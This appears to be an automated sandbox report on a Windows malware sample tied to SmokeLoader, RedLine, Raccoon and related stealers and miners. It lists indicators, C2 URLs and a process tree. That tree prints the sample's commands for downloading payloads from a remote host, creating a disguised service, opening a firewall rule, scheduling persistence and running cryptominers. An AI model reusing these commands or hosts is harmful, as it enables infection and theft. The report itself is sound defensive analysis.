Analysis
-
max time kernel
140s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
09/01/2022, 18:16
Static task
static1
Behavioral task
behavioral1
Sample
0c7cd5a32bf32320089d44dc1a2cb8a3.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
0c7cd5a32bf32320089d44dc1a2cb8a3.exe
Resource
win10-en-20211208
General
-
Target
0c7cd5a32bf32320089d44dc1a2cb8a3.exe
-
Size
289KB
-
MD5
0c7cd5a32bf32320089d44dc1a2cb8a3
-
SHA1
f5d6dbeecc9b6020a34811f5ef6310198288ffc2
-
SHA256
2b8d595d4763ee7ae46bf143f394fe9239d2a0d1a77dea9d2f69cfb5e253c042
-
SHA512
2151614602a002efedd85e158f901be5f145c75376e105a5b6071c89003294336583ec439a64c6dfa760d6709ee1cb5d6bc270355953b9390b2e19409c05099a
Malware Config
Extracted
smokeloader
2020
http://host-data-coin-11.com/
http://file-coin-host-12.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
tofsee
patmushta.info
parubey.info
Extracted
raccoon
1.8.4-hotfixs
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral2/memory/2632-350-0x000000000041C5BE-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 4700 created 4620 4700 WerFault.exe 98 -
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
-
Arkei Stealer Payload 5 IoCs
resource yara_rule behavioral2/memory/744-132-0x0000000000400000-0x0000000002B86000-memory.dmp family_arkei behavioral2/memory/5088-216-0x0000000000AB0000-0x0000000000E6F000-memory.dmp family_arkei behavioral2/memory/5088-217-0x0000000000AB0000-0x0000000000E6F000-memory.dmp family_arkei behavioral2/memory/5088-218-0x0000000000AB0000-0x0000000000E6F000-memory.dmp family_arkei behavioral2/memory/5088-219-0x0000000000AB0000-0x0000000000E6F000-memory.dmp family_arkei -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
LoaderBot executable 1 IoCs
resource yara_rule behavioral2/memory/4456-328-0x00000000013A0000-0x00000000017FB000-memory.dmp loaderbot -
Blocklisted process makes network request 1 IoCs
flow pid Process 167 3460 WScript.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 23 IoCs
pid Process 4344 924.exe 744 28C2.exe 3228 34F8.exe 4296 3F0C.exe 1840 ukuwirin.exe 1956 3F0C.exe 4932 AA98.exe 2960 AA98.exe 5088 B8F1.exe 4620 D13C.exe 2112 F32D.exe 1420 EF3.exe 3528 2347.exe 2820 extd.exe 3380 extd.exe 756 setup1.exe 3232 extd.exe 812 setup2.exe 1288 extd.exe 4456 setup3.exe 3980 extd.exe 2772 3EDF.exe 4588 Driver.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000500000001ab3d-283.dat upx behavioral2/files/0x000500000001ab3d-284.dat upx behavioral2/files/0x000500000001ab3d-288.dat upx behavioral2/files/0x000500000001ab3d-294.dat upx behavioral2/files/0x000500000001ab3d-317.dat upx behavioral2/files/0x000500000001ab3d-326.dat upx -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion B8F1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion B8F1.exe -
Deletes itself 1 IoCs
pid Process 396 Process not Found -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url setup3.exe -
Loads dropped DLL 6 IoCs
pid Process 744 28C2.exe 744 28C2.exe 744 28C2.exe 5088 B8F1.exe 5088 B8F1.exe 5088 B8F1.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\setup3.exe" setup3.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" setup2.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA B8F1.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 5088 B8F1.exe 5088 B8F1.exe 1420 EF3.exe 812 setup2.exe 4456 setup3.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 3440 set thread context of 2576 3440 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 69 PID 4296 set thread context of 1956 4296 3F0C.exe 85 PID 1840 set thread context of 2764 1840 ukuwirin.exe 88 PID 4932 set thread context of 2960 4932 AA98.exe 96 PID 2772 set thread context of 2632 2772 3EDF.exe 122 -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 4700 4620 WerFault.exe 98 3044 756 WerFault.exe 114 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AA98.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AA98.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0c7cd5a32bf32320089d44dc1a2cb8a3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 924.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 924.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 924.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AA98.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0c7cd5a32bf32320089d44dc1a2cb8a3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0c7cd5a32bf32320089d44dc1a2cb8a3.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 B8F1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString B8F1.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 28C2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 28C2.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1160 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 5024 timeout.exe 1372 timeout.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings cmd.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 167 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2576 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 2576 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 396 Process not Found -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 628 Process not Found -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 2576 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 4344 924.exe 396 Process not Found 396 Process not Found 396 Process not Found 396 Process not Found 2960 AA98.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeDebugPrivilege 4296 3F0C.exe Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeDebugPrivilege 1956 3F0C.exe Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeDebugPrivilege 2112 F32D.exe Token: SeRestorePrivilege 4700 WerFault.exe Token: SeBackupPrivilege 4700 WerFault.exe Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeDebugPrivilege 4700 WerFault.exe Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found Token: SeShutdownPrivilege 396 Process not Found Token: SeCreatePagefilePrivilege 396 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3440 wrote to memory of 2576 3440 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 69 PID 3440 wrote to memory of 2576 3440 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 69 PID 3440 wrote to memory of 2576 3440 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 69 PID 3440 wrote to memory of 2576 3440 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 69 PID 3440 wrote to memory of 2576 3440 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 69 PID 3440 wrote to memory of 2576 3440 0c7cd5a32bf32320089d44dc1a2cb8a3.exe 69 PID 396 wrote to memory of 4344 396 Process not Found 70 PID 396 wrote to memory of 4344 396 Process not Found 70 PID 396 wrote to memory of 4344 396 Process not Found 70 PID 396 wrote to memory of 744 396 Process not Found 71 PID 396 wrote to memory of 744 396 Process not Found 71 PID 396 wrote to memory of 744 396 Process not Found 71 PID 396 wrote to memory of 3228 396 Process not Found 72 PID 396 wrote to memory of 3228 396 Process not Found 72 PID 396 wrote to memory of 3228 396 Process not Found 72 PID 396 wrote to memory of 4296 396 Process not Found 73 PID 396 wrote to memory of 4296 396 Process not Found 73 PID 396 wrote to memory of 4296 396 Process not Found 73 PID 3228 wrote to memory of 3348 3228 34F8.exe 74 PID 3228 wrote to memory of 3348 3228 34F8.exe 74 PID 3228 wrote to memory of 3348 3228 34F8.exe 74 PID 3228 wrote to memory of 812 3228 34F8.exe 76 PID 3228 wrote to memory of 812 3228 34F8.exe 76 PID 3228 wrote to memory of 812 3228 34F8.exe 76 PID 3228 wrote to memory of 408 3228 34F8.exe 78 PID 3228 wrote to memory of 408 3228 34F8.exe 78 PID 3228 wrote to memory of 408 3228 34F8.exe 78 PID 3228 wrote to memory of 1204 3228 34F8.exe 80 PID 3228 wrote to memory of 1204 3228 34F8.exe 80 PID 3228 wrote to memory of 1204 3228 34F8.exe 80 PID 3228 wrote to memory of 1576 3228 34F8.exe 82 PID 3228 wrote to memory of 1576 3228 34F8.exe 82 PID 3228 wrote to memory of 1576 3228 34F8.exe 82 PID 4296 wrote to memory of 1956 4296 3F0C.exe 85 PID 4296 wrote to memory of 1956 4296 3F0C.exe 85 PID 4296 wrote to memory of 1956 4296 3F0C.exe 85 PID 3228 wrote to memory of 1752 3228 34F8.exe 86 PID 3228 wrote to memory of 1752 3228 34F8.exe 86 PID 3228 wrote to memory of 1752 3228 34F8.exe 86 PID 4296 wrote to memory of 1956 4296 3F0C.exe 85 PID 4296 wrote to memory of 1956 4296 3F0C.exe 85 PID 4296 wrote to memory of 1956 4296 3F0C.exe 85 PID 4296 wrote to memory of 1956 4296 3F0C.exe 85 PID 4296 wrote to memory of 1956 4296 3F0C.exe 85 PID 1840 wrote to memory of 2764 1840 ukuwirin.exe 88 PID 1840 wrote to memory of 2764 1840 ukuwirin.exe 88 PID 1840 wrote to memory of 2764 1840 ukuwirin.exe 88 PID 1840 wrote to memory of 2764 1840 ukuwirin.exe 88 PID 1840 wrote to memory of 2764 1840 ukuwirin.exe 88 PID 396 wrote to memory of 2300 396 Process not Found 90 PID 396 wrote to memory of 2300 396 Process not Found 90 PID 396 wrote to memory of 2300 396 Process not Found 90 PID 396 wrote to memory of 2300 396 Process not Found 90 PID 396 wrote to memory of 4852 396 Process not Found 91 PID 396 wrote to memory of 4852 396 Process not Found 91 PID 396 wrote to memory of 4852 396 Process not Found 91 PID 744 wrote to memory of 4572 744 28C2.exe 92 PID 744 wrote to memory of 4572 744 28C2.exe 92 PID 744 wrote to memory of 4572 744 28C2.exe 92 PID 4572 wrote to memory of 5024 4572 cmd.exe 94 PID 4572 wrote to memory of 5024 4572 cmd.exe 94 PID 4572 wrote to memory of 5024 4572 cmd.exe 94 PID 396 wrote to memory of 4932 396 Process not Found 95 PID 396 wrote to memory of 4932 396 Process not Found 95 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0c7cd5a32bf32320089d44dc1a2cb8a3.exe"C:\Users\Admin\AppData\Local\Temp\0c7cd5a32bf32320089d44dc1a2cb8a3.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Users\Admin\AppData\Local\Temp\0c7cd5a32bf32320089d44dc1a2cb8a3.exe"C:\Users\Admin\AppData\Local\Temp\0c7cd5a32bf32320089d44dc1a2cb8a3.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2576
-
-
C:\Users\Admin\AppData\Local\Temp\924.exeC:\Users\Admin\AppData\Local\Temp\924.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4344
-
C:\Users\Admin\AppData\Local\Temp\28C2.exeC:\Users\Admin\AppData\Local\Temp\28C2.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:744 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\28C2.exe" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:5024
-
-
-
C:\Users\Admin\AppData\Local\Temp\34F8.exeC:\Users\Admin\AppData\Local\Temp\34F8.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ciwxnhau\2⤵PID:3348
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ukuwirin.exe" C:\Windows\SysWOW64\ciwxnhau\2⤵PID:812
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create ciwxnhau binPath= "C:\Windows\SysWOW64\ciwxnhau\ukuwirin.exe /d\"C:\Users\Admin\AppData\Local\Temp\34F8.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:408
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description ciwxnhau "wifi internet conection"2⤵PID:1204
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ciwxnhau2⤵PID:1576
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:1752
-
-
C:\Users\Admin\AppData\Local\Temp\3F0C.exeC:\Users\Admin\AppData\Local\Temp\3F0C.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Users\Admin\AppData\Local\Temp\3F0C.exeC:\Users\Admin\AppData\Local\Temp\3F0C.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
-
C:\Windows\SysWOW64\ciwxnhau\ukuwirin.exeC:\Windows\SysWOW64\ciwxnhau\ukuwirin.exe /d"C:\Users\Admin\AppData\Local\Temp\34F8.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:2764
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:2300
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4852
-
C:\Users\Admin\AppData\Local\Temp\AA98.exeC:\Users\Admin\AppData\Local\Temp\AA98.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4932 -
C:\Users\Admin\AppData\Local\Temp\AA98.exeC:\Users\Admin\AppData\Local\Temp\AA98.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2960
-
-
C:\Users\Admin\AppData\Local\Temp\B8F1.exeC:\Users\Admin\AppData\Local\Temp\B8F1.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:5088 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\B8F1.exe" & exit2⤵PID:3024
-
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:1372
-
-
-
C:\Users\Admin\AppData\Local\Temp\D13C.exeC:\Users\Admin\AppData\Local\Temp\D13C.exe1⤵
- Executes dropped EXE
PID:4620 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 9162⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4700
-
-
C:\Users\Admin\AppData\Local\Temp\F32D.exeC:\Users\Admin\AppData\Local\Temp\F32D.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
C:\Users\Admin\AppData\Local\Temp\EF3.exeC:\Users\Admin\AppData\Local\Temp\EF3.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1420
-
C:\Users\Admin\AppData\Local\Temp\2347.exeC:\Users\Admin\AppData\Local\Temp\2347.exe1⤵
- Executes dropped EXE
PID:3528 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\23DD.bat C:\Users\Admin\AppData\Local\Temp\2347.exe"2⤵
- Modifies registry class
PID:3448 -
C:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:2820
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16050\123.vbs"3⤵
- Blocklisted process makes network request
PID:3460
-
-
C:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exe "/download" "http://a0617224.xsph.ru/1.exe" "setup1.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:3380
-
-
C:\Users\Admin\AppData\Local\Temp\16050\setup1.exesetup1.exe3⤵
- Executes dropped EXE
PID:756 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 4124⤵
- Program crash
PID:3044
-
-
-
C:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exe "/download" "http://a0617224.xsph.ru/2.exe" "setup2.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:3232
-
-
C:\Users\Admin\AppData\Local\Temp\16050\setup2.exesetup2.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:812
-
-
C:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exe "/download" "http://a0617224.xsph.ru/3.exe" "setup3.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:1288
-
-
C:\Users\Admin\AppData\Local\Temp\16050\setup3.exesetup3.exe3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4456 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:4588
-
-
-
C:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\23DB.tmp\23DC.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:3980
-
-
-
C:\Users\Admin\AppData\Local\Temp\3EDF.exeC:\Users\Admin\AppData\Local\Temp\3EDF.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2772 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd2⤵
- Checks processor information in registry
PID:2632 -
C:\Users\Admin\AppData\Roaming\safas2f.exe"C:\Users\Admin\AppData\Roaming\safas2f.exe"3⤵PID:4560
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobrishe_update -cclock +500 -cvddc +5004⤵PID:4704
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"4⤵PID:5016
-
-
-
C:\Users\Admin\AppData\Roaming\whw.exe"C:\Users\Admin\AppData\Roaming\whw.exe"3⤵PID:4992
-
-
C:\Users\Admin\AppData\Roaming\e3dwefw.exe"C:\Users\Admin\AppData\Roaming\e3dwefw.exe"3⤵PID:608
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"4⤵
- Creates scheduled task(s)
PID:1160
-
-
-
C:\Users\Admin\AppData\Roaming\asdasdw.exe"C:\Users\Admin\AppData\Roaming\asdasdw.exe"3⤵PID:2440
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe1⤵PID:4624
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Disabling Security Tools
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1